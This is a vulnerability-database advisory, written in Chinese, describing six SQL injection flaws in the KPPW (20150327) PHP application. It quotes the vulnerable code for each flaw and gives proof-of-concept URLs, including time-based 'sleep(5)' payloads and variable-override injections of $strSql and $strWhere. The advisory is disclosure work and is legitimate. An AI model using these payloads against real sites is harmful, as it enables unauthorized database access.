|KPPW最新版 6处注入 - VULHUB开源网络安全威胁库

KPPW最新版 6处注入

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：洞太多啦 ### 详细说明： KPPW 最新版20150327 第一处注入：漏洞文件:/control/tasklist.php ``` $m = intval($m); $i = intval($i); $s = intval($s); $r = intval($r); $o = intval($o); $pd = intval($pd); ``` ``` $m and $strUrl .="&m=".$m; $s and $strUrl .="&s=".$s; $r and $strUrl .="&r=".$r; $i and $strUrl .="&i=".$i; $pd and $strUrl .="&pd=".$pd; $o and $strUrl .="&o=".$o; $p and $strUrl .="&p=".intval($p); $ky and $strUrl .="&ky=".$ky; ``` 2处代码未对$p 参数进行intval ``` if (intval ( $p )) { $strWhere .= " and a.province = ".intval($p); $two=db_factory::get_table_data("*","witkey_district","upid=".$p); } ``` intval判断轻松绕过造成注入证明： http://127.0.0.1/kppw0327/index.php?do=tasklist&m=2&s=2&r=2&o=5&p=1 || sleep(5) [<img src="https://images.seebug.org/upload/201504/28161214a74e189b812ccf40ef1332bdcaffdf09.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/28161214a74e189b812ccf40ef1332bdcaffdf09.png) 第二处注入: /control/goodslist.php ``` $m and $strUrl .="&m=".intval($m); $intPage and $strUrl .="&intPage=".intval($intPage); $i and $strUrl .="&i=".intval($i); $pd and $strUrl .="&pd=".intval($pd); $o and $strUrl .="&o=".strval($o); $p and $strUrl .="&p=".intval($p); $ky and $strUrl .="&ky=".$ky; ``` $p参数依然没intval ``` if (intval ( $p )) { $strWhere .= " and a.province = ".intval($p); $two=db_factory::get_table_data("*","witkey_district","upid=".$p); } ``` 同样造成注入证明： http://127.0.0.1/kppw0327/index.php?do=goodslist&m=2&s=2&r=2&o=5&p=1 || 1=sleep(5) [<img src="https://images.seebug.org/upload/201504/28161609e1e2ce34221a75b6ad5fe4773c860c43.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/28161609e1e2ce34221a75b6ad5fe4773c860c43.jpg) 第三处注入: 漏洞文件同上 ``` if (intval ( $twoid )) { $arrCitytwo = CommonClass::getDistrictById($twoid); $strWhere .= " and a.city = ".intval($twoid); $three=db_factory::get_table_data("*","witkey_district","upid=".$twoid); $twoid and $strUrl .="&twoid=".intval($twoid); } ``` 类似一样的证明： http://127.0.0.1/kppw0327/index.php?do=goodslist&m=7&m=0&twoid=1xxx [<img src="https://images.seebug.org/upload/201504/28161756e44f827a08d461ba4e7075342d22d6e7.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/28161756e44f827a08d461ba4e7075342d22d6e7.jpg) ### 漏洞证明：第四处: 漏洞文件:/control/ajax/balance.php ``` $id=intval($id); $orderId=intval($orderId); $arrMemer=db_factory::get_one("select * from ".TABLEPRE."witkey_member where uid=".$gUid); $twoPassword = keke_user_class::get_password ( $arrMemer['password'], $arrMemer['rand_code'] ); if (isset($formhash)&&kekezu::submitcheck($formhash)) { $sec_code=kekezu::escape(trim($zfpwd)); $strMd5Pwd = keke_user_class::get_password ( $sec_code, $gUserInfo ['rand_code'] ); $arrUserInfo=db_factory::get_one(sprintf("select * from %switkey_space where uid=%d and sec_code='%s'",TABLEPRE,intval($gUid),$strMd5Pwd)); switch ($type){ case 'task': $fina_type="pub_".$type; $tips='你已经支付成功了，不需要再次支付！'; $stryzfUrl='index.php?do=task&id='.intval($id); $strwzfUrl='index.php?do=yepay&type='.$type.'&id='.intval($id); $strSql="select * from ".TABLEPRE."witkey_finance where obj_id=".intval($id)." and fina_action='.$fina_type.'"; break; case 'goods': $fina_type="buy_service"; $tips='你已经支付成功了，不需要再次支付！'; $stryzfUrl='index.php?do=goods&id='.intval($id); $strwzfUrl='index.php?do=order&sid='.$id.'&step=step2&orderId='.$orderId.'&action=confirm_pay'; $strSql="select * from ".TABLEPRE."witkey_finance where order_id=".intval($orderId)." and fina_action='.$fina_type.'"; break; case 'service': $fina_type="buy_service"; $tips='你已经支付成功了，不需要再次支付！'; $stryzfUrl='index.php?do=goods&id='.intval($id); $strwzfUrl='index.php?do=order&sid='.$id.'&step=step3&orderId='.$orderId.'&action=pay'; $strSql="select * from ".TABLEPRE."witkey_finance where order_id=".intval($orderId)." and fina_action='.$fina_type.'"; break; case 'pubservice': $tips='你已经支付成功了，不需要再次支付！'; $stryzfUrl='index.php?do=goods&id='.intval($id); $strwzfUrl='index.php?do=yepay&type=service&id='.intval($id)."&orderId=".$orderId; $strSql="select * from ".TABLEPRE."witkey_order where order_id=".intval($orderId)." and order_status='ok'"; break; case 'gy': $fina_type="buy_gy"; $tips['errors']['zfpwd'] = '你已经支付成功了，不需要再次支付！'; $stryzfUrl=NULL; $strwzfUrl='index.php?do=gy&id='.$id.'&step=step3&orderId='.$orderId.'&action=pay'; $strSql="select * from ".TABLEPRE."witkey_order where order_id=".intval($orderId)." and order_status='ok'"; break; case 'taskCash': $fina_type="hosted_reward"; $tips='你已经支付成功了，不需要再次支付！'; $stryzfUrl='index.php?do=task&id='.intval($id); $strwzfUrl="index.php?do=taskhandle&op=consign&taskId=".$id; $strSql="select * from ".TABLEPRE."witkey_finance where obj_id=".intval($id)." and fina_action='.$fina_type.'"; break; } if($arrUserInfo && $type){ $arrFinance=db_factory::get_one($strSql); if($arrFinance){ kekezu::show_msg($tips,$stryzfUrl,'','','success'); ``` 还是先看下kppw的参数获取方式 ``` $_R = $_REQUEST; $_R = kekezu::k_input ( $_R ); $_GET = kekezu::k_input($_GET); $_POST = kekezu::k_input($_POST); $_R and extract ( $_R, EXTR_SKIP ); ``` 可以看到$strSql是在每个case中赋值的如果我们$type=xxx 进入switch却又进入不了每个case 那么可以自己传入$strSql参数 ``` $arrFinance=db_factory::get_one($strSql); ``` 在这里进入查询证明：此处需注册个账号支付密码也得填你自己真正的支付密码即可 [<img src="https://images.seebug.org/upload/201504/28163029b42022dbc697e507eed5c16e3f2cd964.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/28163029b42022dbc697e507eed5c16e3f2cd964.png) 第五处注入: 漏洞文件：/control/ajax/banner.php ``` if($_R['a']==1){ $arr['shop_background']=""; db_factory::updatetable(TABLEPRE."witkey_shop", $arr, "uid=".$_R['id']); kekezu::show_msg('已清除','index.php?do=seller&id='.intval($id),NULL,NULL,'ok'); }elseif($_R['a']==2){ $arr['banner']=""; db_factory::updatetable(TABLEPRE."witkey_shop", $arr, "uid=".$_R['id']); kekezu::show_msg('已清除','index.php?do=seller&id='.intval($id),NULL,NULL,'ok'); } ``` a 为1或2 都行 $_R['id'] 直接放入查询证明: http://127.0.0.1/kppw0327/index.php?do=ajax&view=banner&a=1&id=1xxxx [<img src="https://images.seebug.org/upload/201504/2816340046e766ee20a62a2109eef6748099c108.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/2816340046e766ee20a62a2109eef6748099c108.png) 第六处注入: 漏洞文件:/control/articlelist.php ``` <?php defined ( 'IN_KEKE' ) or exit ( 'Access Denied' ); $strNavActive = 'articlelist'; $strUrl = $_K['siteurl']."/index.php?do=articlelist"; $catid and $strUrl .="&catid=".intval($catid); $intPage and $strUrl .="&intPage=".$intPage; $arrArtCats = kekezu::get_table_data ( "*", "witkey_article_category", "cat_type='article' and art_cat_pid=1", "listorder asc", "", "", "", null ); $page and $intPage = intval($page); $intPage = intval ( $intPage ) ? $intPage : 1; $intPagesize = intval ( $intPagesize ) ? $intPagesize : 20; intval($catid) and $intCatid = intval($catid) or $intCatid = intval($arrArtCats['0']['art_cat_id']); $intCatid and $strWhere .= " and a.art_cat_id = $intCatid"; $strWhere.=" and a.is_show!=2"; $strWhere .=" order by is_recommend desc,a.listorder asc,pub_time desc"; $strSql = "select a.* ,b.cat_name from " . TABLEPRE . "witkey_article a left join " . TABLEPRE . "witkey_article_category b on a.art_cat_id=b.art_cat_id where b.cat_type='article' $strWhere"; ``` $strWhere第一次出现都是 $strWhere .= 来添加未见到定义那么可以直接传入初始值后面都是 .= 添加无影响证明： http://127.0.0.1/kppw0327/index.php?do=articlelist&strWhere=%20and%201=1%23 [<img src="https://images.seebug.org/upload/201504/281639449b1d33ab0d20e3ef820bf48de087dd2c.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/281639449b1d33ab0d20e3ef820bf48de087dd2c.jpg)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™